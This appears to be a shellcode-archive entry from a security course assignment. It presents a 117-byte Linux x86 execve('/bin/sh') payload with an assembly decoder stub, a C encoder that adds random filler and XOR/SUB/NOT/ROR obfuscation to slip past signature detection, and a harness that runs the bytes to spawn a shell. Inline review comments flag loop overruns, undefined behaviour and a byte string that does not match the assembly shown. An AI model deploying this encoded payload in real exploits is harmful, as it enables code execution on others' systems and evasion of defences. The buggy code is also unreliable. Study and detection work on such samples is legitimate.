Linux/x86 Encoder / Decoder Shellcode (117 bytes)
# Title : Linux/x86 - Encoder - Random Bytes + XOR/SUB/NOT/ROR / Decoder - ROL/NOT/ADD/XOR execve(/bin/sh) Shellcode (117 bytes)
# Author : Xenofon Vassilakopoulos
# Date : July, 2019
# Tested on : Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture : i686 GNU/Linux
# Shellcode Length : 117 bytes
# SLAE-ID : SLAE - 1314

---------------------- execve-stack /bin/sh --------------------------------

; Unencoded payload: builds "/bin//sh" on the stack and issues int 0x80 with al = 11.
global _start
section .text
_start:
    xor eax, eax            ; eax = 0
    push eax                ; zero dword: string terminator
    push 0x68732f2f         ; bytes 2f 2f 73 68 = "//sh"
    push 0x6e69622f         ; bytes 2f 62 69 6e = "/bin"
    mov ebx, esp            ; ebx -> "/bin//sh"
    push eax                ; zero dword
    mov edx, esp            ; edx -> that zero dword
    push ebx
    mov ecx, esp            ; ecx -> { ebx, 0 }
    mov al, 11              ; syscall number 11 (execve, per the title)
    int 0x80

----------------------- Original Shellcode ---------------------------------

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes -------

; Decoder stub. It obtains the address of EncodedShellcode from the return
; address of `call decoder`, rewrites those bytes in place in two passes, and
; then jumps into them. Because it writes to the bytes it later executes, it
; only runs from memory that is writable and executable at the same time; the
; test harness further down this page is built with -z execstack.
; NOTE(review): the db bytes below differ from the encoder transcript and from
; the final byte string on this page at the odd positions only; the odd
; positions are the random filler, the even positions are identical in all three.
global _start
section .text
_start:
    jmp short call_shellcode        ; go to the call so its return address can be popped
decoder:
    pop esi                         ; esi = return address = EncodedShellcode
    push esi                        ; keep a copy for the second pass
    xor ebx, ebx
    xor ecx, ecx                    ; cl = loop counter
    xor edx, edx
    mov dl, len                     ; dl = number of db bytes (len equ below)
rotate:
    ;; pass 1: apply the decoding scheme to each byte in place
    rol byte [esi], 4
    not byte [esi]
    add byte [esi], 2
    xor byte [esi], 0x2c
    inc esi
    ; NOTE(review): the compare comes after the transform and cl starts at 0,
    ; so this body runs len+1 times and also rewrites the byte just past the data.
    cmp cl, dl
    je init
    inc cl
    jmp short rotate
init:
    pop esi                         ; back to the start of the data
    lea edi, [esi +1]               ; edi = write cursor, starting at index 1
    xor eax, eax
    mov al, 1                       ; al = read offset, advanced by 2 per iteration
    xor ecx, ecx                    ; reset the counter
decode:
    ;; pass 2: copy the bytes at indexes 2, 4, 6, ... down to 1, 2, 3, ...
    ;; which drops the filler bytes at the odd indexes
    ; NOTE(review): the bound is len (the encoded length), not the payload length,
    ; so the copy keeps reading beyond the db data - confirm this is intended.
    cmp cl, dl
    je EncodedShellcode             ; done: continue execution at the rewritten bytes
    mov bl, byte [esi + eax + 1]
    mov byte [edi], bl
    inc edi
    inc cl
    add al, 2
    jmp short decode
call_shellcode:
    call decoder                    ; pushes the address of EncodedShellcode
    EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
    len equ $-EncodedShellcode      ; byte count of the db line above

--------- Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR ---------------

xenofon@slae:~/Documents/Assignment4$ gcc -o encoder encoder.c
xenofon@slae:~/Documents/Assignment4$ ./encoder

Shellcode:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Shellcode Length 25

Decoded Shellcode:

0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80,

Encoded shellcode

0x4e,0x70,0x51,0x61,0x58,0xf4,0xdb,0xe1,0xef,0xef,0xef,0x6a,0x2a,0x41,0xdb,0x4c,0xdb,0x20,0xef,0xbf,0x3b,0x78,0xcb,0x77,0xfb,0x57,0xc5,0x90,0x23,0x62,0x58,0xf0,0xc5,0xe1,0x33,0xe5,0x28,0x9d,0xc5,0x3d,0x43,0xf6,0x56,0x29,0xad,0x29,0x02,0x57,0x55,0x34,

Encoded Shellcode Length 50

xenofon@slae:~/Documents/Assignment4$ cat encoder.c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

#define DEC 0x2 // the value that is subtracted from every byte
#define XORVAL 0x2c // the value that every byte is XORed with

// execve stack shellcode /bin/sh (25 bytes plus the literal's terminating NUL)
unsigned char shellcode[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

/*
 * Prints the input bytes twice (as \x escapes and as a 0x list), interleaves
 * them with rand() filler bytes, applies XOR / subtract / NOT / 4-bit rotate
 * to every byte of the interleaved buffer, and prints the result.
 *
 * NOTE(review): `void main()` is not a standard signature, and the two
 * length printf calls pass a size_t to %d.
 */
void main()
{
    int rot = 4; // rotation amount in bits
    printf("\n\nShellcode:\n\n");
    int o;
    for (o=0; o<strlen(shellcode); o++) {
        printf("\\x%02x", shellcode[o]);
    }
    printf("\n\nShellcode Length %d\n",sizeof(shellcode)-1);
    // The label says "Decoded", but this prints the same unencoded input again.
    printf("\n\nDecoded Shellcode:\n\n");
    o=0;
    for (o; o<strlen(shellcode); o++) {
        printf("0x%02x,", shellcode[o]);
    }
    printf("\n");
    int i;
    // Scratch array for the rand() output; sizeof(shellcode)*2 is 52 bytes here.
    // NOTE(review): neither malloc result is checked.
    unsigned char *buffer = (char*)malloc(sizeof(shellcode)*2);
    // Seeded from the clock, so the filler bytes differ from run to run.
    srand((unsigned int)time(NULL));
    // Output buffer for the interleaved, then encoded, bytes (52 bytes).
    unsigned char *shellcode2=(char*)malloc(sizeof(shellcode)*2);
    // one-byte staging area that receives each random byte
    unsigned char shellcode3[] = "\xbb";
    int l = 0; // index of the next input byte
    int k = 0; // parity of i
    int j;     // not used below
    // interleave: input bytes go to the even indexes, random filler to the odd ones
    for (i=0; i<(strlen(shellcode)*2); i++) {
        // generate random bytes
        buffer[i] = rand() & 0xff;
        memcpy(&shellcode3[0],(unsigned char*)&buffer[i],sizeof(buffer[i]));
        k = i % 2;
        if (k == 0)
        {
            shellcode2[i] = shellcode[l];
            l++;
        }
        else
        {
            shellcode2[i] = shellcode3[0];
        }
    }
    // apply the encoding scheme
    // NOTE(review): the loop above writes indexes 0..49 and never stores a
    // terminator, so every strlen(shellcode2) from here on reads past the
    // initialised bytes (undefined behaviour); it is also re-evaluated while
    // the buffer is being modified. The recorded run printed a length of 50.
    for (i=0; i<strlen(shellcode2); i++) {
        // XOR every byte with 0x2c
        shellcode2[i] = shellcode2[i] ^ XORVAL;
        // subtract 2 from every byte
        shellcode2[i] = shellcode2[i] - DEC;
        // one's complement negation
        shellcode2[i] = ~shellcode2[i];
        // Labelled ROR by the author. sizeof(shellcode2[i]) is 1, so the right
        // shift is by (8-rot); with rot == 4 both shifts are 4 and the value
        // stored back into the unsigned char has its two nibbles swapped, which
        // equals a rotate by 4 in either direction.
        shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));
    }
    // print encoded shellcode
    printf("\nEncoded shellcode\n\n");
    i=0;
    for (i; i<strlen(shellcode2); i++) {
        printf("0x%02x,", shellcode2[i]);
    }
    printf("\n\nEncoded Shellcode Length %d\n",strlen(shellcode2));
    free(shellcode2);
    free(buffer);
    printf("\n\n");
}

----------------------------------- Shellcode -------------------------------------

xenofon@slae:~/Documents/Assignment4$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
xenofon@slae:~/Documents/Assignment4$ ./shellcode
Shellcode Length: 117
$ whoami
xenofon
xenofon@slae:~/Documents/Assignment4$ cat shellcode.c
#include <stdio.h>
#include <string.h>

/*
 * 117 bytes: a 67-byte decoder stub (through \xe8\xbf\xff\xff\xff) followed by
 * the 50-byte encoded payload. \xb2\x32 loads the payload length 0x32 into dl.
 *
 * The stub and the even-position payload bytes are the same in every copy on
 * this page; only the odd-position filler changes between runs, so byte
 * signatures for this sample can anchor on the stub and the even positions.
 *
 * NOTE(review): the bytes \x8a\x1c\x06 right after \x31\xc9 on the third line
 * appear to decode as `mov bl, [esi+eax]`, an instruction the assembly listing
 * earlier on the page does not show at the top of its decode loop - verify
 * which version the byte string was assembled from.
 */
unsigned char code[] = \
"\xeb\x3c\x5e\x56\x31\xdb\x31\xc9\x31\xd2\xb2\x32\xc0\x06"
"\x04\xf6\x16\x80\x06\x02\x80\x36\x2c\x46\x38\xd1\x74\x04"
"\xfe\xc1\xeb\xec\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xc9"
"\x8a\x1c\x06\x38\xd1\x74\x12\x8a\x5c\x06\x01\x88\x1f\x47"
"\xfe\xc1\x04\x02\xeb\xec\xe8\xbf\xff\xff\xff\x4e\xd1\x51"
"\xb4\x58\x37\xdb\x55\xef\x3d\xef\xbd\x2a\x59\xdb\x81\xdb"
"\x56\xef\xae\x3b\x1a\xcb\xfa\xfb\x43\xc5\x49\x23\x12\x58"
"\xd2\xc5\xee\x33\x82\x28\x49\xc5\xc3\x43\x30\x56\xcb\xad"
"\xe1\x02\x8b\x55\x84";

/*
 * Test harness: prints strlen(code), then casts the array to a function
 * pointer and calls it, so the bytes in code[] are executed from the data
 * array itself. The stub rewrites the payload bytes in place (\xc0\x06\x04 is
 * `rol byte [esi], 4`), so the array has to be writable and executable at the
 * same time; the build line in the transcript above passes -z execstack.
 *
 * NOTE(review): strlen() returns size_t but is printed with %d.
 */
int main()
{
    printf("Shellcode Length: %d\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
}

# 0day.today [2024-11-16] #